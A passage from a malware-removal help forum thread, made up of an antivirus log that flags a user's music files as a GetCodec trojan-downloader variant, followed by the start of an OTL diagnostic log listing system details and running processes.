    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\04 - East Coast Anthem.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\05 - Festival Song.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\06 - Complicated.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\07 - Seasons.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\08 - I Don't Wanna Stop.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\09 - I Heard You.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\10 - The Click.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\11 - Walk By.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\12 - Let Me Go.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\13 - Screamer.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\14 - Change.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\01 Once Upon A Time- The Battle Of Life And Death.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\02 The Chronicles Of Life And Death.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\03 Walk Away (Maybe).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\04 SOS.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\05 I Just Wanna Live.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\06 Ghost Of You.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\07 Predictable.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\08 Secrets.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\09 The Truth.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\10 The World Is Black.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\11 Mountain.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\12 We Believe.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\13 It Wasn't Enough.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\14 In This World (Murder).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\Chronicles of Life and Death (Life Version) 15 Falling Away (Bonus Track).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\01 Good Morning Revival (Intro).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\02 Misery.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\03 The River.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\04 Dance Floor Anthem.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\05 Keep Your Hands Off My Girl.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\06 Victims Of Love.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\07 Where Would We Be Now.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\08 Break Apart Her Heart.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\09 All Black.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\10 Beautiful Place.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\11 Something Else.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\12 Broken Hearts Parade.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\13 March On.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\14 Keep Your Hands Off My Girl (Broken Spindles Remix).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\15 Face The Strange.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\01. Good Charlotte - A New Beginning.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\02. Good Charlotte - The Anthem.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\03. Good Charlotte - Lifestyles of the Rich and Famous.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\04. Good Charlotte - Wondering.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\05. Good Charlotte - The Story of My Old Man.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\06. Good Charlotte - Girls and Boys.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\07. Good Charlotte - My Bloody Valentine.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\08. Good Charlotte - Hold On.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\09. Good Charlotte - Riot Girl.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\10. Good Charlotte - Say Anything.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\11. Good Charlotte - The Day That I Die.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\12. Good Charlotte - The Young and The Hopeless.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\13. Good Charlotte - Emotionaless.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\14. Good Charlotte - Movin' On.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\01 Recapturing The Vibe.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\02 Clown Prince.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\03 The Hard Road.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\04 Stopping All Stations.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\05 Conversations From A Speakeasy [Ft. Omni].mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\06 What A Great Intro.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\07 What A Great Night [DNR].mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\08 City Of Light.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\09 Obese Lowlifes [Ft. Mystro & Braintax].mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\10 Circuit Breaker.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\11 Breathe.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\12 The Blue Blooded.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\13 Monsters Ball.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\14 An Audience With Devil.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\15 The Captured Vibe.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\kevin Bloody Wilson\Kevin Bloody Wilson - Hey Santa Claus You ****.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\kevin Bloody Wilson\Kevin Bloody Wilson - I Saw Mommy ****ing Santa Claus.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\13 It's On!.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\14 Freak on a Leash.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\15 Got the Life.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\16 Dead Bodies Everywhere.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\17 Children of the Korn.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\18 B.B.K.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\19 Pretty.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\20 All in the Family.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\21 Reclaim My Place.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\22 Justin.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\23 Seed.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\24 Cameltosis.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\25 My Gift to You.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\01 Blind.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\02 Ball Tongue.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\03 Need To.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\04 Clown.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\05 Divine.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\06 Faget.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\07 Shoots and Ladders.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\08 Predictable.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\09 Fake.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\10 Lies.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\11 Helmet in the Bush.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\12 Daddy.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Linkin Park\Linkin Park - Behind Your Lies.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Linkin Park\Linkin Park - No More Sorrow.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\01-the_fray-she_is.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\02-the_fray-over_my_head_(cable_car).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\03-the_fray-how_to_save_a_life.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\04-the_fray-all_at_once.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\05-the_fray-fall_away.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\06-the_fray-heaven_forbid.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\07-the_fray-look_after_you.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\08-the_fray-hundred.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\09-the_fray-vienna.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\10-the_fray-dead_wrong.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\11-the_fray-little_house.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\12-the_fray-trust_me.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wierd Al\Weird Al - White and Nerdy.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wierd Al\Weird Al Yankovich - Eat It ( Michael Jackson Parody ).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wierd Al\Weird Al Yankovich - I Wanna Be A Stormtrooper (Starwars).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wierd Al\Wierd Al Yankovich - Spongebob Squarepants.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\01 Dimension.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\02 White Unicorn.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\03 Woman.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\04 Where Eagles Have Been.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\05 Apple Tree.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\06 Joker & The Thief.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\07 Colossal.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\08 Mind's Eye.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\09 Pyramid.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\10 Witchcraft.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\11 Tales.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\12 Love Train.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\13 Vagabond.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
     
    Cosmic Jester,
    #15
  17. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    OTL logfile created on: 6/12/2010 12:47:58 PM - Run 1
    OTL by OldTimer - Version 3.2.17.3 Folder = C:\FIX THIS PC\BBS\OTL
    Windows XP Professional Edition Service Pack 2 (Version = 5.1.2600) - Type = NTWorkstation
    Internet Explorer (Version = 6.0.2900.2180)
    Locale: 00000C09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy

    2.00 Gb Total Physical Memory | 1.00 Gb Available Physical Memory | 51.00% Memory free
    4.00 Gb Paging File | 3.00 Gb Available in Paging File | 80.00% Paging File free
    Paging file location(s): c:\pagefile.sys 2046 4092 [binary data]

    %SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
    Drive C: | 232.88 Gb Total Space | 95.97 Gb Free Space | 41.21% Space Free | Partition Type: NTFS
    Drive E: | 0.38 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS

    Computer Name: MARSHALL-D40729 | User Name: Marshall | Logged in as Administrator.
    Boot Mode: Normal | Scan Mode: Current user | Quick Scan
    Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

    ========== Processes (SafeList) ==========

    PRC - [2010/11/29 17:42:16 | 000,363,344 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    PRC - [2010/11/29 17:42:14 | 000,443,728 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
    PRC - [2010/11/22 10:59:04 | 004,177,272 | ---- | M] (Sysinternals - www.sysinternals.com) -- C:\FIX THIS PC\procexp.exe
    PRC - [2010/11/10 07:08:58 | 000,146,000 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
    PRC - [2010/11/06 08:31:08 | 000,575,488 | ---- | M] (OldTimer Tools) -- C:\FIX THIS PC\BBS\OTL\OTL.exe
    PRC - [2010/10/29 15:57:38 | 000,016,856 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\plugin-container.exe
    PRC - [2010/10/29 15:57:37 | 000,912,344 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
    PRC - [2010/10/29 10:32:48 | 001,352,272 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPointP\SetPoint.exe
    PRC - [2010/10/16 00:40:40 | 000,037,664 | ---- | M] (Apple Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    PRC - [2010/07/17 06:00:10 | 000,145,184 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\java.exe
    PRC - [2010/05/20 18:19:16 | 000,088,176 | ---- | M] (McAfee, Inc.) -- c:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    PRC - [2009/09/28 12:48:08 | 000,264,040 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft LifeChat\LifeChat.exe
    PRC - [2008/12/22 14:59:20 | 000,787,816 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe
    PRC - [2007/09/02 13:58:52 | 000,495,616 | ---- | M] () -- C:\Program Files\RocketDock\RocketDock.exe
    PRC - [2006/12/23 19:05:20 | 000,143,360 | ---- | M] (Nero AG) -- C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    PRC - [2006/12/23 19:04:42 | 000,905,216 | ---- | M] (Nero AG) -- C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
    PRC - [2004/08/04 23:00:00 | 001,032,192 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe


    ========== Modules (SafeList) ==========

    MOD - [2010/11/06 08:31:08 | 000,575,488 | ---- | M] (OldTimer Tools) -- C:\FIX THIS PC\BBS\OTL\OTL.exe
    MOD - [2010/08/24 03:12:02 | 001,054,208 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
    MOD - [2007/09/02 13:57:36 | 000,069,632 | ---- | M] () -- C:\Program Files\RocketDock\RocketDock.dll


    ========== Win32 Services (SafeList) ==========

